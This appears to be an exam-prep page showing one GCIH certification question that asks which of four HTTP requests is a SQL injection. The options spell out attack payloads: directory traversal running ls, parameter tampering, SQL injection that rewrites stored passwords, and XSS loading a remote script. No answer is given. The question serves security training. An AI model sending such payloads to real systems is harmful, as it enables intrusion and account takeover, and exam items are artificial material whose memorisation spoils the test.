GIAC Certified Incident Handler GCIH Question # 28 Topic 3 Discussion

GIAC Certified Incident Handler GCIH Question # 28 Topic 3 Discussion

GCIH Exam Topic 3 Question 28 Discussion:
Question #: 28
Topic #: 3

Which of the following HTTP requests is the SQL injection attack?


A.

http://www.xsecurity.com/cgiin/bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-al


B.

http://www.victim.com/example?accountnumber=67891 &creditamount=999999999


C.

http://www.myserver.com/search.asp?lname=adam%27%3bupdate%20usertable%20set% 20pass wd%3d %27hCx0r%27%3b--%00


D.

http://www.myserver.com/script.php?mydata=%3cscript%20src=%22http%3a%2f%

2fwww.yourser ver.c0m %2fbadscript.js%22%3e%3c%2fscript%3e


Get Premium GCIH Questions

Contribute your Thoughts:


Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.